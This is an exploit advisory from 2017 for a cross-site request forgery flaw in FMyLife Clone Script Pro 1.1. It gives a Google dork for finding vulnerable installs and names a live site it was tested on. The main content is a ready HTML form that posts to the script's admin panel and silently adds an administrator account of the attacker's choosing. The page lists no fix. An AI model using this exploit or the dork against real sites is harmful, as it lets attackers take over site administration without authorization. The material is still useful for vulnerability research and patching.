FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)

2017-01-10 09:05:09

# # # # #
# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
# Google Dork: FMyLife Clone Script
# Date:10.01.2017
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
# Tested on: http://www.tellaboutit.com/admin/
# Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#Exploit :
<html>
<body>
<h2>Add an Administrator</h2>
<form action="http://localhost/[PATH]/admin/" method="post">
<div id="add-admin-form">
<input type="hidden" name="action" value="add-admin" />
<label for="username">Username:</label>
<input type="text" id="username" name="admin-username" value="" />
<div class="spacer"></div>
<label for="password">Password:</label>
<input type="password" id="password" name="admin-password" value="" />
<div class="spacer"></div>
<input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
</div>
</form>
</body>
</html>
# # # # #

Fixes

No fixes

In order to submit a new fix you need to be registered.